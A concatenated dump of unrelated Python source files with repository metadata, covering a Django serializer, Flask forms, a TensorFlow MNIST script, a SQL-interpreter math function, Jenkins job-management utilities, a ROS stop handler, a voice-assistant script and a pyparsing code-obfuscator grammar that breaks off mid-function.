blacklisted_packages = ''.split(';') if '' != '' else []
underlay_workspaces = '/home/anirudh/AuE8930_Anirudh/devel;/opt/ros/noetic'.split(';') if '/home/anirudh/AuE8930_Anirudh/devel;/opt/ros/noetic' != '' else []
| [
"sundar@clemson.edu"
] | sundar@clemson.edu |
deae7399994f02fc02cd2a1de41c3876a0a42f3d | d5005de630cbfcac46b6f90be845a827a029ff0d | /urlshortner/api/serializer.py | c040926e02219c805df9c6c192f55d7729c0b142 | [] | no_license | mahinm20/url-shortner | d4b18917a002aa12f4fdd1f6f3e2bf026b34f0ad | ea084f96136d5810b8ad6d53bf0acc1a8291b782 | refs/heads/master | 2023-08-11T07:35:04.804424 | 2021-09-14T09:37:27 | 2021-09-14T09:37:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 216 | py | from django.db.models import fields
from rest_framework.serializers import ModelSerializer
from .models import Link
class LinkSerializer(ModelSerializer):
class Meta:
model=Link
fields='__all__'
| [
"mahinmalhotra20@gmail.com"
] | mahinmalhotra20@gmail.com |
783d9eaf39f755988c056cbfc471d7f851e2376f | dbcf98b6e62363aae0c27873494b31a87fc66b72 | /search/__init__.py | 801b8e09a375dbd1a270d7670eba10025485a202 | [] | no_license | cfannybf/be_nomad | b5c999c2dff89892d27a058809e516bbf74b7598 | be997e22678f62e512f9a09f776d9ac475f3b610 | refs/heads/master | 2022-08-26T12:13:02.682020 | 2020-05-18T18:58:26 | 2020-05-18T18:58:26 | 190,804,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | from search.stack_overflow import *
from search.search_base import *
from search.stack_overflow_parser import *
from search.remoteok_parser import *
from search.remoteok import *
from search.wework import *
from search.wework_parser import *
| [
"noreply@github.com"
] | noreply@github.com |
c6755d3c49392ed98bf5598dd336b05f2b3d11fc | 296f091643221e821fc54edf3abe107701ea5394 | /app/forms.py | 5f2badb5df4cf951dc15f385e5859ec61d7fa957 | [
"Apache-2.0"
] | permissive | koksalkapucuoglu/MicroBlogwFlask | 4335ffab64950286e1b902fc36b573c99103c5c8 | fe9904d4a350c1a3e808c65122f6f9d4b11380c1 | refs/heads/master | 2023-08-20T08:53:55.097219 | 2021-09-28T19:22:35 | 2021-09-28T19:22:35 | 325,088,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField, TextAreaField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, Length
from app.models import User
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
password2 = PasswordField(
'Repeat Password', validators=[DataRequired(), EqualTo('password')])
submit = SubmitField('Register')
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user is not None:
raise ValidationError('Please use a different username.')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user is not None:
raise ValidationError('Please use a different email address.')
class EditProfileForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
about_me = TextAreaField('About me', validators=[Length(min=0, max=140)])
submit = SubmitField('Submit')
def __init__(self, original_username, *args, **kwargs):
super(EditProfileForm, self).__init__(*args, **kwargs)
self.original_username = original_username
def validate_username(self, username):
if username.data != self.original_username:
user = User.query.filter_by(username=self.username.data).first()
if user is not None:
raise ValidationError('Please use a different username.')
class EmptyForm(FlaskForm):
submit = SubmitField('Submit') | [
"koksalkapucuoglu@hotmail.com"
] | koksalkapucuoglu@hotmail.com |
3a2e7b9af3dd389ece469119d3a337902f903c4b | 9ac33eada39f98bc680ba7b483a2504cfbb8a5a9 | /MNIST_EXAMPLE.py | 2ea2b7ff73ad9339de29e6731e97200f5f085c2b | [] | no_license | ZhouNan1212/DeepLearning | 600e8e03085ec6f610a91942ea74d03f03b62bba | 5ad85fa9629e1cfc16ef6af6e2ce4c7d32882be6 | refs/heads/master | 2021-08-18T16:45:21.063850 | 2017-11-23T09:43:33 | 2017-11-23T09:43:33 | 111,786,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,230 | py | # -*- coding: utf-8 -*-
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
#载入MNIST数据集
mnist = input_data.read_data_sets("./MNIST_data/", one_hot=True)
print "Training data size: ", mnist.train.num_examples
print "Training data size: ", mnist.validation.num_examples
print "Training data size: ", mnist.test.num_examples
batch_size = 100
xs, ys = mnist.train.next_batch(batch_size)
# 从train中选取batch_size个训练数据。
print "X shape:", xs.shape
print "Y shape:", ys.shape
# MNIST数据集相关参数
INPUT_NODE = 784
OUTPUT_NODE = 10
# 配置神经网络的参数
LAYER1_NODE = 500
BATCH_SIZE = 100
LEARNING_RATE_BASE = 0.8 # 基础学习率
LEARNING_RATE_DECAY = 0.8 # 学习率的衰减率
REGULARIZATION_RATE = 0.0001 # 正则项的系数
TRAINING_STEPS = 30000 # 训练论数
MOVING_AVERAGE_DECAY = 0.99 # 滑动平均衰减率
def inference(input_tensor, avg_class, weights1, biases1, weights2, biases2):
if avg_class is None:
layer1 = tf.nn.relu(tf.matmul(input_tensor, weights1) + biases1)
return tf.matmul(layer1, weights2) + biases2
else:
layer1 = tf.nn.relu(
tf.matmul(input_tensor, avg_class.average(weights2)) +
avg_class.average(biases1))
return tf.matmul(layer1, avg_class.average(weights2) + avg_class.average(biases2))
def train(mnist):
x = tf.placeholder(tf.float32, [None, INPUT_NODE], name='x-input')
y_ = tf.placeholder(tf.float32, [None, OUTPUT_NODE], name='y-input')
#生成隐藏层的参数
weights1 = tf.Variable(
tf.truncated_normal([INPUT_NODE, LAYER1_NODE], stddev=0.1))
biases1 = tf.Variable(tf.constant(0.1, shape=[LAYER1_NODE]))
#生成输出层参数
weights2 = tf.Variable(
tf.truncated_normal([LAYER1_NODE, OUTPUT_NODE], stddev=0.1))
biases2 = tf.Variable(tf.constant(0.1, shape=[OUTPUT_NODE]))
y = inference(x, None, weights1, biases1, weights2, biases2)
global_step = tf.Variable(0, trainable=False)
variable_averages = tf.train.ExponentialMovingAverage(
MOVING_AVERAGE_DECAY, global_step)
variable_averages_op = variable_averages.apply(tf.trainable_variables())
| [
"zhounan157@163.com"
] | zhounan157@163.com |
2b8c95450b6dafc15c3eb213a1f25e67cc7da7f2 | 59b4d74dbb9439274ec799f7c371dc0f606d6812 | /app/main.py | 81ff453a790eb816aa23c8462adf760780d732c6 | [] | no_license | gitzjm/ming-blog-backend | da33291e029c5af52a659ff86815d16df48051d1 | 32493e0d7aa78ff202b742c7c490882301806cbf | refs/heads/master | 2022-12-02T16:06:01.930097 | 2020-08-21T09:48:09 | 2020-08-21T09:48:09 | 288,148,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | # coding=UTF-8
"""``main``
"""
import uvicorn
from core.conf import conf
if __name__ == "__main__":
uvicorn.run(
"app:app",
host=conf.server.host,
port=int(conf.server.port),
log_level="info",
debug=bool(conf.server.debug)
)
| [
"zhaojunming@ninstarscf.com"
] | zhaojunming@ninstarscf.com |
d00bbbb216b7a6dd68e5e30782867450683596a9 | af4abf0a22db1cebae466c56b45da2f36f02f323 | /parser/fase2/team17/Traduccion/Interprete/SELECT/Select_simples.py | 470eb54c24056715c25c9bffd423dd943a3e791e | [
"MIT"
] | permissive | joorgej/tytus | 0c29408c09a021781bd3087f419420a62194d726 | 004efe1d73b58b4b8168f32e01b17d7d8a333a69 | refs/heads/main | 2023-02-17T14:00:00.571200 | 2021-01-09T00:48:47 | 2021-01-09T00:48:47 | 322,429,634 | 3 | 0 | MIT | 2021-01-09T00:40:50 | 2020-12-17T22:40:05 | Python | UTF-8 | Python | false | false | 5,528 | py | from Interprete.NodoAST import NodoArbol
from Interprete.Tabla_de_simbolos import Tabla_de_simbolos
from Interprete.Arbol import Arbol
from Interprete.Valor.Valor import Valor
from Interprete.Primitivos.TIPO import TIPO
from Interprete.SELECT.indexador_auxiliar import indexador_auxiliar
from Interprete.SELECT.indexador_auxiliar import IAT
from Interprete.simbolo import Simbolo
import math
import random
class Select_simples(NodoArbol):
def __init__(self, exp, tipo, line, coliumn):
super().__init__(line, coliumn)
self.exp = exp
self.tipo = tipo
def execute(self, entorno: Tabla_de_simbolos, arbol: Arbol):
if self.tipo == "FACTORIAL":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno:Valor = Valor(TIPO.DECIMAL, math.factorial( int(str(expresion.data)) ))
return retorno
elif self.tipo == "FLOOR":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.floor(float(str(expresion.data))))
return retorno
elif self.tipo == "GCD":
expresion1: Valor = self.exp[0].execute(entorno, arbol) # <--- numero
expresion2: Valor = self.exp[1].execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.gcd(int(str(expresion1.data)), int(str(expresion2.data))))
return retorno
elif self.tipo == "LN":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.log10(float(str(expresion.data))))
return retorno
elif self.tipo == "LOG":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.log(float(str(expresion.data))))
return retorno
elif self.tipo == "MOD":
expresion1: Valor = self.exp[0].execute(entorno, arbol) # <--- numero
expresion2: Valor = self.exp[1].execute(entorno, arbol) # <--- numero
v = int(str(expresion1.data)) % int(str(expresion2.data))
retorno: Valor = Valor(TIPO.DECIMAL, v)
return retorno
elif self.tipo == "PI":
retorno: Valor = Valor(TIPO.DECIMAL, math.pi)
return retorno
elif self.tipo == "POWER":
expresion1: Valor = self.exp[0].execute(entorno, arbol) # <--- numero
expresion2: Valor = self.exp[1].execute(entorno, arbol) # <--- numero
v = int(str(expresion1.data)) ** int(str(expresion2.data))
retorno: Valor = Valor(TIPO.DECIMAL, v)
return retorno
elif self.tipo == "RADIANS":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.radians(float(str(expresion.data))))
return retorno
elif self.tipo == "ROUND":
expresion1: Valor = self.exp[0].execute(entorno, arbol) # <--- numero
expresion2: Valor = self.exp[1].execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, round(float(str(expresion1.data)) , int(str(expresion2.data))))
return retorno
elif self.tipo == "SIGN":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
v = 0
if float(str(expresion.data)) > 0:
v = 1
else:
v = -1
retorno: Valor = Valor(TIPO.DECIMAL, v)
return retorno
elif self.tipo == "SQRT":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.sqrt(float(str(expresion.data))))
return retorno
elif self.tipo == "TRUNC":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.trunc(float(str(expresion.data))))
return retorno
elif self.tipo == "RANDOM":
retorno: Valor = Valor(TIPO.DECIMAL, random.randrange(1024))
return retorno
elif self.tipo == "CBRT":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, self.CBRT(float(str(expresion.data))))
return retorno
elif self.tipo == "CEIL":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.ceil(float(str(expresion.data))))
return retorno
elif self.tipo == "DEGREES":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.degrees(float(str(expresion.data))))
return retorno
elif self.tipo == "DIV":
expresion1: Valor = self.exp[0].execute(entorno, arbol) # <--- numero
expresion2: Valor = self.exp[1].execute(entorno, arbol) # <--- numero
v = int(str(expresion1.data)) / int(str(expresion2.data))
retorno: Valor = Valor(TIPO.DECIMAL, int(v))
return retorno
elif self.tipo == "EXP":
expresion: Valor = self.exp.execute(entorno, arbol) # <--- numero
retorno: Valor = Valor(TIPO.DECIMAL, math.exp(float(str(expresion.data))))
return retorno
def CBRT(self, n):
return n ** (1./3.) | [
"jm7740779@gmail.com"
] | jm7740779@gmail.com |
9d3f9d143b195b5f1bef682c639bc5c98f28425c | 326bb8dad81acd1d90255967d76097f5fedd038d | /task6.py | efd9dbe87ca817674896d5099076f3161f995437 | [] | no_license | yuki-kasahara/nus966-readable-code | 50d7cd5add593b2ce7c20df4e45f36b31ed92488 | 713d626c1b6ef9d59a3829692f30aa3312c66149 | refs/heads/main | 2023-07-28T01:55:09.890592 | 2021-09-14T05:53:50 | 2021-09-14T05:53:50 | 406,227,655 | 0 | 1 | null | 2021-09-14T04:48:49 | 2021-09-14T04:48:48 | null | UTF-8 | Python | false | false | 380 | py | import sys
import pandas as pd
args = sys.argv
dictionary = pd.read_csv("dictionary.csv")
# 引数が無ければすべて出力, IDが指定されていれば指定IDの単語出力
if len(args) <= 1:
for id_, word in zip(dictionary['ID'],dictionary['単語']):
print(str(id_) + ':' + word)
else:
print(args[1] + ':' + str(dictionary['単語'][int(args[1])])) | [
"kassan182tec@gmail.com"
] | kassan182tec@gmail.com |
da133734e4a1cdb645608157f9a0e331a43bcc6d | 9ce4f67e2b592bf2573227c8e62734a07c7998c1 | /param.py | 4083ba2d7b6cbc3667729341bc7e3e39766a43d0 | [] | no_license | cobbxia/jjiepanmen | 1a0db5ae130e3a6f7ab722a2572e674d80599259 | a4ce035266155b927a310ab8426b520a5912a67f | refs/heads/master | 2020-06-12T07:25:04.507536 | 2016-12-12T02:46:25 | 2016-12-12T02:46:25 | 75,597,467 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 11,313 | py | '''
This file contains jenkins api
'''
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append("./pkg")
sys.path.append("./pkg/jenkinsapi")
sys.path.append("./pkg/pytz")
sys.path.append("./pkg/requests")
import jenkinsapi
from jenkinsapi.jenkins import Jenkins
import json
import xml.etree.ElementTree as Etree
import cfg
import time
from tree import Node
import Queue
import threading
import ConfigParser
import jenkins
from util import detect_reg
class myconf(ConfigParser.ConfigParser):
def __init__(self,defaults=None):
ConfigParser.ConfigParser.__init__(self,defaults=None)
def optionxform(self, optionstr):
return optionstr
def printnode(nodes):
for node in nodes:
print(node.tag,node.attrib,node.text)
def get_job_cfgparam(groupname,jobname):
print(groupname,jobname)
paramconffile="%s.conf" % (jobname)
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
jobconfig = job.get_config()
tree = Etree.fromstring(jobconfig)
pnodes = tree.findall("./properties")
printnode(pnodes)
if pnodes == None or len(pnodes)==0:
return None
pnode=pnodes[0]
print(pnode)
textParamNodes=pnode.find("hudson.model.ParametersDefinitionProperty").find("parameterDefinitions").findall("hudson.model.TextParameterDefinition")
printnode(textParamNodes)
confignode=None
for node in textParamNodes:
print(node)
if node.find('name').text== "config":
confignode=node
if confignode != Node:
outmancfg=confignode.find("defaultValue").text
print("cfg:%s" % outmancfg)
else:
print("config node is empty")
return
cfgfile=open(paramconffile,"w")
cfgfile.write(outmancfg)
cfgfile.close()
cf = myconf()
cf.read(paramconffile)
return cf
def add_job_cfgparam(groupname,jobname,section,option,val,isupdate=False):
print(groupname,jobname)
paramconffile="%s.conf" % (jobname)
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
jobconfig = job.get_config()
tree = Etree.fromstring(jobconfig)
pnodes = tree.findall("./properties")
printnode(pnodes)
if pnodes == None or len(pnodes)==0:
return None
pnode=pnodes[0]
print(pnode)
textParamNodes=pnode.find("hudson.model.ParametersDefinitionProperty").find("parameterDefinitions").findall("hudson.model.TextParameterDefinition")
printnode(textParamNodes)
confignode=None
for node in textParamNodes:
print(node)
if node.find('name').text== "config":
confignode=node
if confignode != Node:
outmancfg=confignode.find("defaultValue").text
print("cfg:%s" % outmancfg)
else:
print("config node is empty")
return
cfgfile=open(paramconffile,"w")
cfgfile.write(outmancfg)
cfgfile.close()
cf = myconf()
cf.read(paramconffile)
if cf.has_section(section):
cf.set(section,option,val)
else:
cf.add_section(section)
cf.set(section,option,val)
cf.write(open(paramconffile, "w"))
if isupdate==True:
confignode.find("defaultValue").text="".join(open(paramconffile,"r").readlines())
if cfg.debug == True:
print(confignode.find("defaultValue").text)
open("%s.xml" % (jobname),"w").write(Etree.tostring(tree))
job.update_config(Etree.tostring(tree))
return cf
def get_element_children(element):
'''return the element children if the element is not None.'''
if element is not None:
if cfg.debug:
print('begin to handle the element : [{}]'.format(element))
return [c for c in element]
else:
print('the element is None!')
def get_job_slave(groupname,jobname):
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
jobconfig = job.get_config()
tree = Etree.fromstring(jobconfig)
roamnode = tree.findall("./canRoam")
if roamnode != None:
roamnode[0].text="false"
nodes = tree.findall("./assignedNode")
print nodes
if nodes == None or len(nodes)==0:
tree.append(Etree.fromstring('<assignedNode>'+slave+'</assignedNode>'))
else:
node = nodes[0]
print(node.text)
return node.text
def get_job_xml(groupname,jobname):
#phelp()
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
jobxml=job.get_config()
print(jobxml)
'''
waiting until job done
'''
def build_job_poll(jobname,params=None):
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
if params==None:
params={'block':True}
else:
params['block']=True
try:
print 'startjob===>'+jobname
response = jkserver.build_job(jobname, params)
print response
print 'waiting build'
while(job.is_queued_or_running()):
time.sleep(1)
time.sleep(1)
print 'finish'
except Exception,e:
print e
'''
trigger the job and exits
'''
def build_job(jobname, params=None):
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
try:
print 'startjob===>'+jobname
response = jkserver.build_job(jobname, params)
except Exception,e:
print e
def get_job_child(groupname,jobname):
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
jobconfig = job.get_config()
tree = Etree.fromstring(jobconfig)
children = tree.find("publishers").find("hudson.tasks.BuildTrigger").find("childProjects").text
print(children)
'''
generate module name and jenkins job dict
'''
def gendict(gname,jobname):
m2jdict={}
srcfile="%s_module_list.txt" % (gname)
dstfile="%s_module2jenkins.txt" % (gname)
dstfp=open(dstfile,"w")
for mname in open(srcfile,"r"):
mname=mname.strip("\n")
dstfp.write("%s:%s\n" % (mname,detect_reg(gname,mname)) )
dstfp.close()
def get_child_job(gname,jobname):
m2jdict=loadm2jdict(gname)
joblist=[]
jobdict={}
jobdict["jobname"]=jobname
slave=get_job_slave(gname,jobname)
jobdict["slave"]=slave
joblist.append(jobdict)
children=get_job_children(gname,jobname)
if children != "":
for child in children.split(","):
slave=get_job_slave(gname,child)
childdict={"jobname":child,"slave":slave}
filterdict.append(child)
joblist.append(childdict)
else:
return joblist
'''
get all jenkins jobname and slave in one group
'''
def getAllJob(gname,jobname):
m2jdict=loadm2jdict(gname)
filterdict={}
allJobList=[]
for mname in m2jdict:
joblist=[]
jobdict={}
jobname=m2jdict[mname]
if jobname is None or jobname == "None":
print("module:%s not found" % mname)
continue
slave=get_job_slave(gname,jobname)
jobdict["slave"]=slave
jobdict["jobname"]=jobname
joblist.append(jobdict)
allJobList.append(joblist)
encodedjson = json.dumps(allJobList)
print(encodedjson)
open("%s.txt" % (gname),"w").write(encodedjson)
def loadm2jdict(gname):
m2jdict={}
srcfile="%s_module2jenkins.txt" % (gname)
for line in open(srcfile,"r"):
line=line.strip("\n")
if cfg.debug == True:
print(line)
(key,val)=line.split(":")
m2jdict[key]=val
return m2jdict
def modify_branch(jobname,new_branch):
print(jobname)
if jobname=="None" or jobname is None :
return
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
try:
branch=job.get_scm_branch()
except Exception,e:
print e
return
print(branch)
job.modify_scm_branch(new_branch)
branch=job.get_scm_branch()
print(branch)
'''
modify scm branch in batch,groupname and new_branch
"5ktest" "*/release/20151230_sprint21"
'''
def batch_scm_modify(gname,new_branch):
new_branch=cfg.new_branch
srcfile="%s_module2jenkins.txt" % (gname)
for line in open(srcfile,"r"):
jobname=line.strip("\n").split(":")[1]
if jobname is None or jobname == "" or jobname == "None":
continue
modify_branch(jobname,new_branch)
def modify_5k_scm():
gname="5ktest"
new_branch="*/release/20151230_sprint21"
batch_scm_modify(gname,new_branch)
'''
'''
def get_cfg(jobname):
print(jobname)
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
print(job.get_config())
def rerun(groupname,jobname,block=True):
#jobname="mztest_git"
#groupname="5ktest"
secname="runtime"
optname="failed"
val="True"
params={}
cf=add_job_cfgparam(groupname,jobname,secname,optname,val)
paramconffile="%s.conf" % (jobname)
params["config"]="".join(open(paramconffile,"r").readlines())
#print(params["config"])
if jobname.lower().find("outman") >=0:
if block==True:
build_job_poll(jobname, params)
else:
build_job(jobname, params)
else:
print("job:%s not outman,cann't rerun" % (jobname))
class Rerun:
def __init__(gname):
self.gname=gname
self.m2jfile="%s_module2jenkins.txt" % (self.gname)
self.mlist=[]
self.failJobList=[]
self.m2jdict={}
for line in open(self.m2jfile,"r"):
line=line.strip("\n")
mname=line.split(":")[0]
jenkinsname=line.split(":")[1]
self.m2jdict[mname]=jenkinsname
def get_fail_jobname(self):
today=time.strftime('%Y-%m-%d',time.localtime(time.time()))
for mname in self.m2jdict:
pass
def batch_modify_endpoint(gname):
for line in open("%s_module2jenkins.txt" % (gname),"r"):
line =line.strip("\n")
jobname=line.split(":")[1]
if jobname.lower().find("outman") < 0:
print(jobname)
continue
isupdate=True
section=""
option="end_point"
val=""
try:
add_job_cfgparam(gname,jobname,section,option,val,isupdate)
except Exception,e:
print e
def batch_modify_clt(gname):
for line in open("%s_module2jenkins.txt" % (gname),"r"):
line =line.strip("\n")
jobname=line.split(":")[1]
if jobname.lower().find("outman") < 0:
print(jobname)
continue
isupdate=True
section="client"
option="console_download"
val=cfg.newdailyrunconsole
try:
add_job_cfgparam(gname,jobname,section,option,val,isupdate)
except Exception,e:
print e
def get_build_status(jobname):
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
builddict=job.get_build_dict()
print(builddict)
def get_last_console(jobname):
jkserver=jenkins.API().get_jenkins_instance()
job=jkserver.get_job(jobname)
build=job.get_last_build()
content=build.get_console()
open("content.txt","w").write(content)
if __name__ == '__main__':
gname="release"
batch_modify_endpoint(gname)
| [
"mingchao.xiamc@alibaba-inc.com"
] | mingchao.xiamc@alibaba-inc.com |
0adba5da91a33419ea09749723d1a920e81a0c9b | 03041e8ea52da1ead0257eb5155864c8456d569c | /iosis.py | dd9f18d4d0504ab52288baa88111be36a0f1a4dc | [] | no_license | AbhijeetSasmal1512/DemoAssistant | ce70550dea74bc49b738efd4282b1f3e1944b90a | cc3f25abab767a2cd86b1cb1bacdecbd1e3d8a95 | refs/heads/master | 2020-12-03T01:06:55.863285 | 2020-01-01T02:57:36 | 2020-01-01T02:57:36 | 231,168,925 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | #!/usr/bin/python2.7
import speech
import text
import os
import sqlite3
import logging
conn = sqlite3.connect('/home/abhijeet/Documents/Assistant/command.db')
speech.speak("Hello, I am Enori. What can I do for you today?")
command = text.stt()
command = command.lower()
logging.basicConfig(filename='iosis.log',level=logging.INFO)
def createTable(conn):
conn.execute('''CREATE TABLE COMMAND
(ID INTEGER PRIMARY KEY AUTOINCREMENT,
SPEECH TEXT NOT NULL,
CMD TEXT NOT NULL,
ANSWER TEXT NOT NULL);''')
print("Table created")
def addCommand(conn, speech, cmd, answer):
query = "INSERT INTO COMMAND (SPEECH,CMD,ANSWER) VALUES ('%s','%s', '%s');" % (speech , cmd, answer)
conn.execute(query)
conn.commit()
def findAllCommand(conn):
query = "SELECT SPEECH FROM COMMAND"
cursor = conn.execute(query)
return cursor
def findCommand(conn, speech):
query = "SELECT CMD, ANSWER FROM COMMAND WHERE SPEECH = '%s'" % (speech)
logging.info(query)
cursor = conn.execute(query)
return cursor
def Action():
if("command" in command):
sp = raw_input("Enter the speech of the command : ")
cmd = raw_input("Enter the command : ")
answer = raw_input("Enter the answer of the command : ")
addCommand(conn, sp, cmd, answer)
elif command == 'open terminal':
os.system('gnome-terminal')
speech.speak('Opening Terminal')
elif len(findCommand(conn, command).fetchall()) != 0:
action = findCommand(conn, command)
for row in action:
os.system(row[0])
speech.speak(row[1])
else:
print "Unable to process"
try:
Action()
except:
logging.info("hello")
logging.info(command)
speech.speak("Unable to process the Information")
| [
"abhijeetsasmal4@gmail.com"
] | abhijeetsasmal4@gmail.com |
ec7a336d36360b63b1ea14ba97b47d6294826dcb | ecb6959f545e3a56691efba917ddfdf3217fd14f | /src/sigint_catcher.py | 677472dfa9b2647251665c4746dcfc04a011e2f1 | [] | no_license | campusrover/gen5 | 1c15aa809e2ed3877e4e81aace3fb0cab73260df | c225f56c4e92bf5ad1d35018d67f25e2fdcfebd8 | refs/heads/master | 2022-11-01T07:53:43.658999 | 2020-06-15T21:36:22 | 2020-06-15T21:36:22 | 244,982,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | #!/usr/bin/env python
import rospy
import signal
import sys
from geometry_msgs.msg import Twist
'''stops the robot when the program is remotely interrupted'''
def signal_handler(sig, frame):
print('Stopping Turtlebot3...')
twist = Twist()
cmd_vel.publish(twist)
print('Exit program...')
sys.exit(0)
rospy.init_node('sigint_catcher')
cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size = 1)
signal.signal(signal.SIGINT, signal_handler)
signal.pause() | [
"danbing123@gmail.com"
] | danbing123@gmail.com |
d9b86a2d17b2af62a0ab7bc718273c678c98a0ad | eafe44014fb8e3f4539c729e5bcd8ecc2fe71743 | /ifg_front/dili_api/apps.py | 1238c08bb1b3c88c1b323e8716055992beb03410 | [] | no_license | smilebulee/infogen_ims | 83deede19bdf4daf7784280da085ecd36030efa7 | a9feb634657fba93f46f2b902004a6c14a37f4c3 | refs/heads/master | 2023-05-28T07:29:55.586051 | 2023-05-24T07:50:13 | 2023-05-24T07:50:13 | 245,916,505 | 2 | 7 | null | 2023-02-15T17:51:38 | 2020-03-09T01:17:04 | JavaScript | UTF-8 | Python | false | false | 90 | py | from django.apps import AppConfig
class DiliApiConfig(AppConfig):
name = 'dili_api'
| [
"bulee@infogen.co.kr"
] | bulee@infogen.co.kr |
5797a16c125952321a989b028c6032123109f0c2 | 3ed5562cca39fb76c3fe67d4c2c3952851c2d11b | /logic/obfuscatefile/obfuscatepythonbnf.py | e5d70c616c98b7abd042bc66541659791f36dea9 | [
"MIT"
] | permissive | blacknoize404/pymixup | f754aa6f8c9e50d2560f6e54a4a3810d35ac9c90 | 9004fbdc7939033014b0eefa669056014647a0c8 | refs/heads/master | 2021-12-09T19:26:49.517470 | 2016-06-09T19:01:04 | 2016-06-09T19:01:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,988 | py | from peewee import DoesNotExist
from pyparsing import Literal, Optional, ZeroOrMore
from logic.obfuscatefile import ObfuscateBNF
from logic.reserved import add_reserveds, get_reserved_by_name
from logic.utilities import obfuscate_path
class ObfuscatePythonBNF(ObfuscateBNF):
def __init__(self, get_obfuscated):
"""BNF grammar for Python source statements.
Parameters
----------
get_obfuscated : function
Function to return the obfuscated name for an identifier.
"""
super(ObfuscatePythonBNF, self).__init__(get_obfuscated)
self.validator = \
Literal('@') + \
Literal('validate') + \
Literal('(') + \
self.string + \
self.string + \
Literal(')')
# Parse a Kivy load_file statement
self.builder = \
Literal('Builder.load_file(') + \
self.string + \
Literal(')')
self.statement = (
ZeroOrMore(
(self.directive |
self.builder |
self.tab |
self.conseq_idents_numbs |
self.separator |
self.string_or_doc |
self.triple_quote)
) + Optional(self.comment).suppress()
)
self.except_error = (
ZeroOrMore(
(self.tab.suppress() |
Literal('except') |
self.directive.suppress() |
self.tab.suppress() |
self.ident |
self.separator.suppress() |
self.fnumber.suppress() |
self.string_or_doc.suppress() |
self.triple_quote.suppress())
) + Optional(self.comment).suppress()
)
self.from_import = (
ZeroOrMore(
(self.tab.suppress() |
Literal('from') |
self.directive.suppress() |
self.tab.suppress() |
self.ident |
Literal('import') |
self.separator.suppress() |
self.fnumber.suppress() |
self.string_or_doc.suppress() |
self.triple_quote.suppress())
) + Optional(self.comment).suppress()
)
self.except_error.setParseAction(self.add_except_error)
self.builder.setParseAction(self.transform_builder)
self.from_import.setParseAction(self.add_from_import)
###############
# Parse actions
###############
def add_from_import(self, from_import_list):
"""Add imported modules from reserved modules to reserved.
Parameters
----------
from_import_list : list
"""
if not from_import_list or \
from_import_list[0] != 'from' or \
'import' not in from_import_list[:]:
return
reserved_list = set()
import_index = from_import_list[:].index('import')
package_name = ''
is_reserved = False
for reserve_name in from_import_list[1:import_index]:
# Start with first reserved directory in tree (if one exists)
if not is_reserved:
try:
get_reserved_by_name(reserve_name)
is_reserved = True
package_name = reserve_name
except DoesNotExist:
continue
if is_reserved:
if reserve_name[0].isalpha() or reserve_name[0] == '_':
reserved_list.add(reserve_name)
if is_reserved:
# Get imported items
for reserve_name in from_import_list[import_index+1:]:
if reserve_name[0].isalpha() or reserve_name[0] == '_':
reserved_list.add(reserve_name)
add_reserveds(package_name, reserved_list)
def add_except_error(self, except_error_list):
"""Add except Error names to reserved.
Parameters
----------
except_error_list : list
"""
if not except_error_list or except_error_list[0] != 'except':
return
reserved_list = set()
